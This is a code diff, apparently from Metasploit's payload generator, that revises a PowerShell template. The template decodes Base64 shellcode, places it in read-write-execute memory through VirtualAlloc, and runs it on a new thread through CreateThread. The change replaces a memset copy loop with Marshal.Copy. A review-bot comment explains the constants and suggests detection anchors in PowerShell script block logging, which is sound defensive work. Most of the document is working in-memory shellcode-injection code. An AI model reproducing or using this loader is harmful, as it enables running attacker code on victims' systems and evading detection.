parent
deefabb559
commit
14c0096115
|
@ -21,11 +21,7 @@ function %{func_get_delegate_type} {
|
||||||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
||||||
|
|
||||||
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
||||||
$%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
||||||
|
|
||||||
for ($i=0;$i -le ($%{var_code}.Length-1);$i++) {
|
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
||||||
$%{var_memset}.Invoke([IntPtr]($%{var_buffer}.ToInt32()+$i), $%{var_code}[$i], 1) | Out-Null
|
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
||||||
}
|
|
||||||
|
|
||||||
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | Out-Null
|
|
||||||
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xFFFFFFFF) | Out-Null
|
|
|
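Review bot: The allocation line kept as context passes the bare constants `0x3000` and `0x40` to VirtualAlloc with no comment. These are MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE, so a template comment such as `# allocates a read-write-execute region, copies the decoded bytes into it and runs them on a new thread` would make the behaviour plain to anyone auditing generated scripts. For detection, the new side replaces the per-byte msvcrt `memset` delegate loop with a single `[System.Runtime.InteropServices.Marshal]::Copy` call. Rules keyed on the memset delegate should be re-anchored on what both versions share: the Base64 decode, the `GetDelegateForFunctionPointer` lookups of VirtualAlloc and CreateThread, and the RWX protection value. All of these would be expected to appear in PowerShell script block logging. The enclosing script starts before the hunk, so the helper functions it calls are not visible here.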
@ -937,7 +937,6 @@ require 'msf/core/exe/segment_injector'
|
||||||
rig.init_var(:var_return_type)
|
rig.init_var(:var_return_type)
|
||||||
rig.init_var(:var_type_builder)
|
rig.init_var(:var_type_builder)
|
||||||
rig.init_var(:var_buffer)
|
rig.init_var(:var_buffer)
|
||||||
rig.init_var(:var_memset)
|
|
||||||
rig.init_var(:var_hthread)
|
rig.init_var(:var_hthread)
|
||||||
|
|
||||||
hash_sub = rig.to_h
|
hash_sub = rig.to_h
|
||||||
|
|